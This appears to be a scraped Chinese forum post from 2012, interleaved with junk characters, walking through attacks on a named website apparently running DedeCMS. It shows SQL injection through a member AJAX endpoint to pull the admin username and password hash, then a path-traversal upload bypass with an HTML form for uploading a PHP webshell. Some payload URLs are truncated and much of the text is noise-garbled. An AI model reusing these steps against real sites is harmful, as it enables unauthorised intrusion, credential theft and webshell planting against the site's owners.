①注入漏洞。
. W& G3 D! I/ O. a这站 http://www.political-security.com/, D% q, ? d6 f( e! Y$ @* }8 a7 }
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,3 O4 P, U1 V# F) y6 s& s$ ?. E
www.political-security.com/data/mysql_error_trace.inc 爆后台: y. b- q- N, L+ K1 w5 ~2 @5 i( [
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
4 O; l) [4 Z- ~然后写上语句 2 p w3 l. n3 ]7 s5 `9 s( c- e
查看管理员帐号" b3 h" T- m9 y% |) K0 w
http://www.political-security.co ... &membergroup=@`- w; u \; j+ S
, p" @4 n; s) K' @3 ?2 j
admin
3 W' i1 B) U/ Y5 b+ R: d4 _5 [1 P& h y# |6 q% s
查看管理员密码
% d3 A: q) h- L2 C http://www.political-security.co ... &membergroup=@` E. z Y: M2 h2 V U6 I. C
$ C, ^6 @1 d6 b, ?: y) p8d29b1ef9f8c5a5af429/ l) ^( `6 o# _+ Q' ^6 Q
: ^" B$ ~0 n: R6 E* e+ _ s查看管理员密码* X0 \( [9 M& P, @$ |8 N6 w
7 q1 ? a* n- h7 ~得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
' u) ]. e" Y; W; c2 H
; `1 A$ w: I3 z; L0 @& t) H, t8d29 e* }; K, y4 E7 G! B
9b1ef9f8c5a5af42: E8 J6 R+ s% M, J. Q( z2 x4 p
9
; j7 a2 O! Q; ^3 {' P5 {9 B. n4 T5 q! C( u
cmd5没解出来 只好测试第二个方法
: ^5 V2 A0 T9 [ ^7 A; Y! N1 \
& p& T% o T- R h6 D9 k3 u* J8 r7 a8 ^$ T9 u L0 t9 k( H7 M
②上传漏洞:
* C4 V. v+ k# c) N! E5 m
9 o9 R! H9 r, Z& e% ?4 H+ B% n只要登陆会员中心,然后访问页面链接
7 h* ~! z5 M9 x @0 u“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
7 R: ?0 ?0 Z, _! }
* ]/ r7 o8 A. i3 L3 _如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
2 E% S! m# F: H5 C5 x
! W( |- D+ c: v q于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm2 H) v2 Y! e8 @1 v& W, E4 b$ f4 |
" E9 j1 o, @6 w( M8 J/ m7 J U5 t<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
& [ o8 ] t1 n2 |: W或者
e. i- e$ S% D; y( U1 w即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对